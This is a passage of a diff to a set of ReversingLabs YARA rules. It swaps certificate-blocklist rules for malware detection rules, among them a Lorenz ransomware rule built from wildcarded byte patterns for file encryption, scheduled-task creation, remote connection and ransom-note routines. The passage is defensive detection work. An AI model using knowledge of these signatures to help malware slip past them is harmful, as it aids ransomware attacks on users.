+            ?? ?? ?? 83 7D ?? ?? 75 ?? 83 C8 ?? EB ?? 83 7D ?? ?? 74 ?? 8B 55 ?? 52 FF 15 ?? ??
+            ?? ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 74 ?? 8B 4D ?? 51
+            FF 15 ?? ?? ?? ?? 8B E5 5D C3
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE5\\x8C\\x97\\xE4\\xBA\\xAC\\xE9\\x87\\x91\\xE5\\x88\\xA9\\xE5\\xAE\\x8F\\xE6\\x98\\x8C\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures [ i ] . serial == "1a:0f:d2:a4:ef:4c:2a:36:ab:9c:5e:8f:79:2a:35:e2" and 1389311999 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and $encrypt_files and $remote_server and $remote_server_2
 }
-
-rule REVERSINGLABS_Cert_Blocklist_53Bb753B79A99E61A6E822Ac52460C70 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_Lorenz : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects Lorenz ransomware."
 		author = "ReversingLabs"
-		id = "6339d548-775b-52b9-84c5-a79de23a16b2"
-		date = "2023-11-08"
-		modified = "2023-11-08"
+		id = "cc97dd15-d518-5d9f-9384-3dcf81e34e81"
+		date = "2022-10-24"
+		modified = "2022-10-24"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L2672-L2688"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "24ff4f46fa6e85c25e130459f9b8d6907cf6cd51098e0cf45ec11d54d7de509b"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/ransomware/Win32.Ransomware.Lorenz.yara#L1-L252"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "b8668fcc560d264c37e3fbb52d5a5f1223a282abd9e984b3109efe9ab454be9f"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Lorenz"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_files_v1_p1 = {
+            BE ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? A5 6A ?? 6A ?? 68 ?? ?? ?? ?? FF B5 ?? ??
+            ?? ?? A5 A5 A4 8B 35 ?? ?? ?? ?? FF D6 89 85 ?? ?? ?? ?? 33 C0 50 68 ?? ?? ?? ?? 6A
+            ?? 50 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D6 68 ?? ?? ?? ?? 6A ?? 6A ?? 89 85
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 85 C0 75
+            ?? FF D6 8B 3D ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? FF D7 EB ?? 8B 3D ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85
+            C0 75 ?? FF D6 6A ?? FF B5 ?? ?? ?? ?? FF D7 6A ?? 6A ?? 53 FF B5 ?? ?? ?? ?? FF 15
+            ?? ?? ?? ?? 85 C0 75 ?? FF D6 8D 85 ?? ?? ?? ?? 33 DB 50 53 FF B5 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF D6 53 FF B5 ?? ?? ?? ??
+            FF D7 6A ?? 8D 45 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ??
+            ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 53 8B 9D ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B
+            0D ?? ?? ?? ?? 83 A5 ?? ?? ?? ?? ?? 89 4D ?? 66 8B 0D ?? ?? ?? ?? 66 89 4D ?? 8D 4D
+            ?? 89 85 ?? ?? ?? ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 6A ?? 50 2B CA 8D 45 ?? 51 50 56 FF 15 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 68
+            ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 33 C0 50 50
+        }
+		$encrypt_files_v1_p2 = {
+            50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 33 D2 42 3B C2 75 ?? 83 BD ?? ?? ?? ?? ??
+            0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15
+            ?? ?? ?? ?? 33 D2 42 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 03 8D
+            ?? ?? ?? ?? 3B 8D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 6A ?? 89 8D ?? ?? ?? ?? 0F 44 C2 8D
+            8D ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 51 8D 4D ?? 51 6A ?? 50 6A ?? FF B5 ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 85 C0 74 ?? 83 A5 ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 FF B5 ??
+            ?? ?? ?? 8D 45 ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 8D 45 ?? 6A ?? 50 E8 ??
+            ?? ?? ?? 83 C4 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 45 ?? 50 53 FF 15 ?? ?? ?? ??
+            85 C0 0F 85 ?? ?? ?? ?? 6A ?? FF B5 ?? ?? ?? ?? FF D7 FF B5 ?? ?? ?? ?? FF 15 ?? ??
+            ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 53 FF D6 8B 85 ?? ?? ??
+            ?? 50 FF D6 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F
+            5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2
+        }
+		$find_files_v1_p1 = {
+            FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 6A ?? 0F 57 C0 C6 45
+            ?? ?? 6A ?? 6A ?? 0F 11 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 85 ?? ?? ?? ?? 85
+            C0 74 ?? 89 18 89 58 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 08 8B 3D ?? ?? ?? ??
+            8B B5 ?? ?? ?? ?? C6 45 ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F
+            84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68
+            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85
+            ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF
+            D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ??
+            ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85
+            C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF D7 85 C0 0F 84 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B F0 C6 45 ?? ?? 8D 8D
+        }
+		$find_files_v1_p2 = {
+            8B 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 56 8B D0 C6 45 ?? ?? 8D 4D ?? E8
+            ?? ?? ?? ?? 59 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 75 ?? 68 ?? ?? ??
+            ?? 0F 43 75 ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 56 50 89 85 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B B5 ?? ?? ?? ?? 83 C4 ?? F6 85 ?? ?? ?? ?? ?? 75 ?? 56 8D 4D ?? E8 ?? ?? ??
+            ?? 8D 45 ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 56 E8
+            ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 59 74 ?? 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 83 7D ?? ?? 8D 75 ?? 68 ?? ?? ?? ?? 0F 43 75 ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ??
+            ?? 56 50 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 E8 ??
+            ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8D 4D ?? E8 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? C7 45 ?? ??
+            ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59
+            B8 ?? ?? ?? ?? C3 C7 45 ?? ?? ?? ?? ?? 33 DB 8B 85 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 89
+            85 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F
+            85 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8D 8D
+        }
+		$create_scheduled_task_v1 = {
+            FF 15 ?? ?? ?? ?? 33 FF 85 C0 74 ?? 8B CF 8A 84 0D ?? ?? ?? ?? 88 84 0D ?? ?? ?? ??
+            41 84 C0 75 ?? 8D BD ?? ?? ?? ?? 4F 8A 47 ?? 47 84 C0 75 ?? BE ?? ?? ?? ?? A5 A5 66
+            A5 33 FF 57 68 ?? ?? ?? ?? 6A ?? 57 57 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ??
+            ?? ?? ?? 8B 4B ?? 8B F0 89 BD ?? ?? ?? ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 57 8D 85 ??
+            ?? ?? ?? 2B CA 50 51 FF 73 ?? 56 FF 15 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 83 C4 ?? 8B
+            F2 8A 02 42 84 C0 75 ?? 8D BD ?? ?? ?? ?? 2B D6 4F 8A 47 ?? 47 84 C0 75 ?? 8B CA C1
+            E9 ?? F3 A5 8B CA 83 E1 ?? F3 A4 8D 8D ?? ?? ?? ?? 49 8A 41 ?? 41 84 C0 75 ?? 66 A1
+            ?? ?? ?? ?? 33 DB 8B 35 ?? ?? ?? ?? BF ?? ?? ?? ?? 66 89 01 A0 ?? ?? ?? ?? 53 53 88
+            41 ?? 8D 85 ?? ?? ?? ?? 50 57 53 53 FF D6 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 53 53 68
+            ?? ?? ?? ?? 57 53 53 FF D6 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3
+        }
+		$remote_connection_v1 = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 53 8B
+            5D ?? 8D 44 24 ?? 56 57 8B 7D ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A
+            ?? 6A ?? 6A ?? 58 50 FF 15 ?? ?? ?? ?? 8B F0 83 FE ?? 74 ?? 6A ?? 58 53 66 89 44 24
+            ?? FF 15 ?? ?? ?? ?? FF 75 ?? 89 44 24 ?? FF 15 ?? ?? ?? ?? 66 89 44 24 ?? 8D 44 24
+            ?? 6A ?? 50 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 8B CF 8D 51 ?? 8A 01 41 84 C0 75 ??
+            6A ?? 2B CA 51 57 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 56 FF 15 ?? ?? ?? ?? FF 15 ??
+            ?? ?? ?? 33 C0 8B 8C 24 ?? ?? ?? ?? 5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 5D C2
+        }
+		$check_mutex_v1 = {
+            E8 ?? ?? ?? ?? 59 59 56 C6 45 ?? ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? 50 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 50 FF B5
+            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 7D ?? ?? 7E ?? 8B 57 ?? E8 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 59 FF 77 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B C8 C6 45 ?? ?? E8 ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? 50 56 FF D3 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ??
+            56 FF 15 ?? ?? ?? ?? 8B F8 FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 94 C0 85 FF 74 ?? 84
+            C0 74 ?? 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 56
+        }
+		$find_files_v2 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 83 EC ?? 53
+            56 57 89 65 ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 EC ?? C6 45
+            ?? ?? 8D 4D ?? 54 E8 ?? ?? ?? ?? 83 EC ?? 8D 4D ?? 54 E8 ?? ?? ?? ?? 83 EC ?? 8D 4D
+            ?? 54 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? E8 ??
+            ?? ?? ?? 83 EC ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 8D 4D ??
+            3B 45 ?? 0F 87 ?? ?? ?? ?? 83 EC ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ??
+            51 50 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B F0 8D 45 ?? 3B C6 74 ?? 8B 45 ?? 83 F8
+            ?? 72 ?? 6A ?? 40 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 C7 45 ?? ?? ?? ?? ?? 56
+            8D 4D ?? C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B
+            7D ?? 33 F6 8B 5D ?? 83 FE ?? 73 ?? 8B 0C B5 ?? ?? ?? ?? 8D 45 ?? 83 FF ?? 0F 43 C3
+            66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1
+            ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 74 ?? 46 EB ?? 8D 4D ?? E8 ?? ??
+            ?? ?? B0 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C2 ?? ?? 8D 4D ?? E8 ??
+            ?? ?? ?? 8B 4D ?? 32 C0 5F 5E 64 89 0D ?? ?? ?? ?? 5B 8B E5 5D C2 ?? ?? 8D 45
+        }
+		$encrypt_files_v2_p1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 51 B8 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 53 56 57 C7 45 ?? ?? ?? ?? ?? 8B F1 8B 7D ?? 8D 4D ?? 89 65 ??
+            57 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 8B CE 50 E8
+            ?? ?? ?? ?? 8B D8 C6 45 ?? ?? 8D 4D ?? 89 5D ?? E8 ?? ?? ?? ?? 8B 75 ?? 56 E8 ?? ??
+            ?? ?? 83 C4 ?? 56 53 50 E8 ?? ?? ?? ?? 8B 75 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56
+            50 E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 83 C4 ?? 49 0F 1F 40 ?? 8A 41 ?? 8D 49 ?? 84 C0
+            75 ?? A1 ?? ?? ?? ?? ?? ?? ?? ?? 00 00 08 89 ?? ?? ?? ?? 4E 00 6A ?? 6A ?? 89 41 ??
+            A1 ?? ?? ?? ?? ?? ?? ?? ?? 08 A0 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? 88
+            41 ?? FF D6 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 68 ??
+            ?? ?? ?? 50 FF D6 68 ?? ?? ?? ?? 6A ?? 6A ?? 89 45 ?? 8D 45 ?? 6A ?? 50 FF 15 ?? ??
+            ?? ?? 8B 35 ?? ?? ?? ?? 85 C0 75 ?? FF D6 8B 1D ?? ?? ?? ?? 6A ?? FF 75 ?? FF D3 EB
+            ?? 8B 1D ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ??
+            ?? 85 C0 75 ?? FF D6 6A ?? FF 75 ?? FF D3 6A ?? 6A ?? 57 FF 75 ?? FF 15 ?? ?? ?? ??
+            85 C0 75 ?? FF D6 8D 45 ?? 50 6A ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ??
+            ?? 85 C0 75 ?? FF D6 6A ?? FF 75 ?? FF D3 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50
+        }
+		$encrypt_files_v2_p2 = {
+            E8 ?? ?? ?? ?? 8B 7D ?? 83 C4 ?? 33 F6 C7 45 ?? ?? ?? ?? ?? 33 DB 89 5D ?? 56 57 FF
+            15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 89 4D ?? 66 8B 0D ?? ?? 4E 00 66 89 4D ?? 8D 4D ??
+            89 45 ?? 8D 51 ?? 89 5D ?? 8A 01 41 84 C0 75 ?? 6A ?? 8D 45 ?? 2B CA 50 51 8D 45 ??
+            50 FF 75 ?? FF 15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? FF 75 ?? FF 75 ?? FF
+            15 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ??
+            ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 66 0F 1F 44 00 ?? 8B 45 ?? 85 C0 0F 84 ?? ?? ?? ?? 03
+            F0 33 C9 3B 75 ?? 75 ?? 85 C9 75 ?? 33 DB 83 F8 ?? 0F 95 C3 68 ?? ?? ?? ?? 8D 45 ??
+            50 8D 85 ?? ?? ?? ?? 50 6A ?? 53 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ??
+            8D 45 ?? C7 45 ?? ?? ?? ?? ?? 50 FF 75 ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? FF 15 ?? ??
+            ?? ?? 85 C0 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
+            8D 45 ?? 6A ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F
+            85 ?? ?? ?? ?? 6A ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ??
+            FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 57 FF D6 FF 75 ?? FF D6 8B 4D ?? 5F 5E 64 89 0D
+            ?? ?? ?? ?? 5B 8B E5 5D C2 ?? ?? 8D 45
+        }
+		$remote_connection_v2 = {
+            55 8B EC 51 53 56 57 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? FF
+            15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B F0 68 ?? ?? ?? ?? 56
+            FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B D8 6A ??
+            53 FF 15 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B F8 6A ?? 57 FF 15 ?? ?? ?? ?? 6A ?? 6A ??
+            8D 45 ?? 50 57 FF 15 ?? ?? ?? ?? 56 8B 35 ?? ?? ?? ?? FF D6 53 FF D6 57 FF D6 5F 5E
+            33 C0 5B 8B E5 5D C3
+        }
+		$drop_ransom_note_v2_p1 = {
+            6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 89 45 ??
+            C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 6A ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7
+            45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 85 C0 74 ?? C7 00 ?? ?? ?? ?? C7
+            40 ?? ?? ?? ?? ?? 8B 45 ?? 8D 4D ?? 89 08 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45
+            ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 68 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? ?? ?? ?? ?? 87 FB 00 00 00 A0 ?? ??
+            ?? ?? 88 87 ?? ?? ?? ?? 8B F7 8D 4E ?? 0F 1F 40 ?? 8A 06 46 84 C0 75 ?? 2B F1 8D 46
+            ?? 50 E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 74 ?? 56 57 53 E8 ?? ?? ?? ?? 6A ?? 8D 04
+            33 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F3 8D 4E ?? 0F 1F 44 00 ?? 8A 06 46
+            84 C0 75 ?? 2B F1 8D 86 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 56
+            53 57 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 04 37 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 8B F7 8D 4E ?? 8A 06 46 84 C0 75 ?? 2B F1 8D 86 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B
+            D8 83 C4 ?? 85 DB 74 ?? 56 57 53 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 04 33 68 ?? ?? ??
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F3 8D 4E ?? 8A 06 46 84 C0 75 ?? 2B F1 8D 46 ?? 50
+        }
+		$drop_ransom_note_v2_p2 = {
+            E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 56 53 57 E8 ?? ?? ?? ?? 6A ?? 8D 04 37 68
+            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F7 8D 4E ?? 0F 1F 00 8A 06 46 84 C0 75 ??
+            2B F1 8D 46 ?? 50 E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 74 ?? 56 57 53 E8 ?? ?? ?? ??
+            F3 0F 7E 05 ?? ?? ?? ?? 83 C4 ?? 66 0F D6 04 33 8B F3 8D 4E ?? 8A 06 46 84 C0 75 ??
+            2B F1 8D 46 ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 56 53 57 E8 ?? ?? ?? ??
+            6A ?? 8D 04 37 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F7 8D 4E ?? 8A 06 46 84
+            C0 75 ?? 2B F1 8D 46 ?? 50 E8 ?? ?? ?? ?? 8B D8 83 C4 ?? 85 DB 74 ?? 56 57 53 E8 ??
+            ?? ?? ?? 6A ?? 8D 04 33 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F3 8D 4E ?? 66
+            90 8A 06 46 84 C0 75 ?? 2B F1 8D 46 ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ??
+            56 53 57 E8 ?? ?? ?? ?? 6A ?? 8D 04 37 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B
+            CF 5B 8D 51 ?? 0F 1F 40 ?? 8A 01 41 84 C0 75 ?? 8B 75 ?? 8D 45 ?? 6A ?? 50 2B CA 51
+            57 56 FF 15 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 56 FF 15 ?? ?? ?? ?? 8D 4D
+            ?? E8 ?? ?? ?? ?? 8B 4D ?? 5F 5E 64 89 0D ?? ?? ?? ?? 8B E5 5D C2
+        }
+
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xEB\\x8D\\xB0\\xEC\\x8A\\xA4\\xED\\x81\\xAC\\xED\\x83\\x91\\xEC\\x95\\x84\\xEC\\x9D\\xB4\\xEC\\xBD\\x98" and pe.signatures [ i ] . serial == "53:bb:75:3b:79:a9:9e:61:a6:e8:22:ac:52:46:0c:70" and 1400543999 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( ( ( all of ( $encrypt_files_v1_p* ) ) and ( all of ( $find_files_v1_p* ) ) and ( $create_scheduled_task_v1 ) and ( $remote_connection_v1 ) and ( $check_mutex_v1 ) ) or ( ( $find_files_v2 ) and ( all of ( $encrypt_files_v2_p* ) ) and ( $remote_connection_v2 ) and ( all of ( $drop_ransom_note_v2_p* ) ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_83F68Fc6834Bf8Bd2C801A2D1F1Acc76 : INFO FILE
+rule REVERSINGLABS_Win32_Ransomware_PXJ : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
